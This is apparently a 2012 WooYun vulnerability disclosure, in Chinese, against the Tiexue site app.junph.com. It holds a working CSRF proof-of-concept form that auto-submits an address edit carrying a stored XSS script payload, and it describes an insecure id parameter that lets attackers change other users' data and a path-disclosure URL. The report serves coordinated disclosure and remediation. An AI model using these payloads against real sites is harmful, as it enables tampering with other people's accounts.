当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010311

漏洞标题:铁血各种缺陷结合希望重视。

相关厂商:北京铁血科技

漏洞作者: _Evil

提交时间:2012-07-29 17:50

修复时间:2012-09-12 17:50

公开时间:2012-09-12 17:50

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-29: 细节已通知厂商并且等待厂商处理中
2012-07-31: 厂商已经确认,细节仅向厂商公开
2012-08-10: 细节向核心白帽子及相关领域专家公开
2012-08-20: 细节向普通白帽子公开
2012-08-30: 细节向实习白帽子公开
2012-09-12: 细节向公众公开

简要描述:

NuLL.

详细说明:

http://app.junph.com/Client/MyAddress.aspx
存储Xss:街道地方



CSRF:

<form action="http://app.junph.com/CallBack/UserCenterCallBack.ashx" method="post">
<input type="test" name="type" value="edit"/>
<input type="test" name="userName" value="wooyun"/>
<input type="test" name="provice" value="%25E5%25AE%2589%25E5%25BE%25BD"/>
<input type="test" name="city" value="%25E5%25B7%25A2%25E6%25B9%2596"/>
<input type="test" name="street" value="%3cscript%3ealert(%2fxss%2f)%3c%2fscript%3e"/>
<input type="test" name="zip" value="529600"/>
<input type="test" name="moblie" value="12345678911"/>
<input type="test" name="tel" value=""/>
<input type="test" name="def" value="true"/>
<input type="test" name="email" value="[email protected]"/>
<input type="test" name="id" value="90383"/>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>


最后一个严重了跨域修改:

<input type="test" name="id" value="90383"/>


id修改为别人的就中招:
id=90386为我其他一个账号(晴天小铸1)


经过测试可用修改任何id=xxx (我测试范围不超过90386)

漏洞证明:

1.Xss:



2.CSRF

<form action="http://app.junph.com/CallBack/UserCenterCallBack.ashx" method="post">
<input type="test" name="type" value="edit"/>
<input type="test" name="userName" value="wooyun"/>
<input type="test" name="provice" value="%25E5%25AE%2589%25E5%25BE%25BD"/>
<input type="test" name="city" value="%25E5%25B7%25A2%25E6%25B9%2596"/>
<input type="test" name="street" value="%3cscript%3ealert(%2fxss%2f)%3c%2fscript%3e"/>
<input type="test" name="zip" value="529600"/>
<input type="test" name="moblie" value="12345678911"/>
<input type="test" name="tel" value=""/>
<input type="test" name="def" value="true"/>
<input type="test" name="email" value="[email protected]"/>
<input type="test" name="id" value="90383"/>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>


3.跨域:


商城是外包?
送个爆路径:
app.junph.com/Shopping/OrderDetail.aspx?OrderCode=201207297887999&gotpay=0

ERP.UI.WEB.APP.Shopping.OrderDetail.Page_Load(Object sender, EventArgs e) in F:\jobs\TFS_workspace\TxErp2\TxErp\ERP.UI.WEB.APP\Shopping\OrderDetail.aspx.cs

修复方案:

使用antixss防御xss你们做到了,街道地方被特殊编码过了所以。。。。。
Xss修复:服务端URL编码回来再过滤再编码。
CSRF:token Referer (你们站,没有验证码的地方,基本都有CSRF....)
跨域问题:
你们应该知道的,应该是粗心。
爆路径:最简单的,404页面。

版权声明:转载请注明来源 _Evil@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-07-31 18:08

厂商回复:

需要时间全站进行修改,感谢关注铁血

最新状态:

暂无